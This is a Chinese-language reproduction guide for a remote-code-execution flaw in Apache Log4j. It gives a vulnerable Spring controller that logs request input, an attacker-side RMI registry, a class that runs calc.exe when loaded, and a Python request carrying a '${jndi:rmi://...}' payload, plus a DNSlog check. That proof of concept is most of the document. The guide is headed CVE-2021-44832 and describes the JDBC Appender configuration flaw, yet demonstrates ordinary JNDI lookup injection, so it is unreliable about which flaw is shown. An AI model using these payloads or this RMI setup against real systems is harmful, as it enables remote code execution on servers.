Apache Log4j(CVE-2021-44832)远程代码执行漏洞复现
1. 漏洞介绍:
Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。
Apache Log4j2 2.0-beta7 到 2.17.0版本存在安全漏洞,该漏洞源于软件中对于JDBC Appender 和JNDI 缺少有效的防护与过滤。有权修改日志配置文件的攻击者可以构建恶意配置 将 JDBC Appender 与引用 JNDI URI 的数据源一起使用,该 JNDI URI 可以执行远程代码。
2. 漏洞原理:
log4j是一款通用日志记录工具,开发人员可以使用log4j对当前程序状态进行记录。log4j的功能非常强大,开发人员除了直接记录文本外,还可以使用简单表达式记录动态内容,例如:
http://logger.info("system propety: ${sys:user.dir}");
简单表达式使用 ${} 进行包裹,上述示例中,sys:user.dir 表示使用sys解析器,查找user.dir的内容,即在系统环境变量中查找user.dir,以替换 ${sys:user.dir} 进行打印。
此外log4j还有很多其它类型的解析器,其中jndi解析器就是本次漏洞的源头
jndi 解析器将通过 jdk 获取 jndi 对象,并使用这个 jndi 对象替换原有文本进行打印。 我们将 jndi 对象理解成为一个从程序外部获取的 Java 程序对象就可以了。jdk中提供了多种不同 jndi 对象的获取方式,获取方式可以称为schema,所以正常的包含jndi的日志记录方式如下:
http://logger.info("system propety: ${jndi:schema://url}");
关于jndi注入具体原理可以看下这篇文章,这里我就不在详细介绍了。
https://security.tencent.com/index.php/blog/msg/131
3. 漏洞验证:
1、启动java项目:示例代码
package com.yy.app;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.*;
@RestController
@RequestMapping("/api")
public class SearchController {
private static final Logger logger = LogManager.getLogger(SearchController.class);
@RequestMapping(value = "/search", method = RequestMethod.GET)
public String search(@RequestBody String keyWord) {
logger.info("search requestParam:{}", keyWord);
return "返回成功";
}
}
2、启动搭建的攻击机的rmi环境,示例代码
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class HackService {
public static void main(String[] args) {
try {
// 启动服务
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
// 创建资源
Reference reference = new Reference("com.yy.hacker.HackText", "com.yy.hacker.HackText", null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
// 绑定资源
registry.bind("hack", referenceWrapper);
System.out.println("服务初始化完成");
} catch (Exception e) {
e.printStackTrace();
}
}
}
import java.io.IOException;
public class HackText {
static {
try {
/* open /System/Applications/Calculator.app*/
/*打开计算器*/
Runtime.getRuntime().exec("C:\\Windows\\System32\\calc.exe");
} catch (IOException e) {
e.printStackTrace();
}
}
}
3、启动好两个服务后,模仿用户发起请求。示例代码
import requests
url = "http://127.0.0.1:8888/api/search"
parms = '"${jndi:rmi://127.0.0.1:9999/hack}"'
res = requests.get(url=url, data=parms)
也可以使用DNSlog来测试,测试方法:
- 在浏览器打开http://dnslog.cn/点击它获取一个域名
2.发起一个请求后,查看是否有解析到地址,如果有解析到IP地址那么说明是存在该漏洞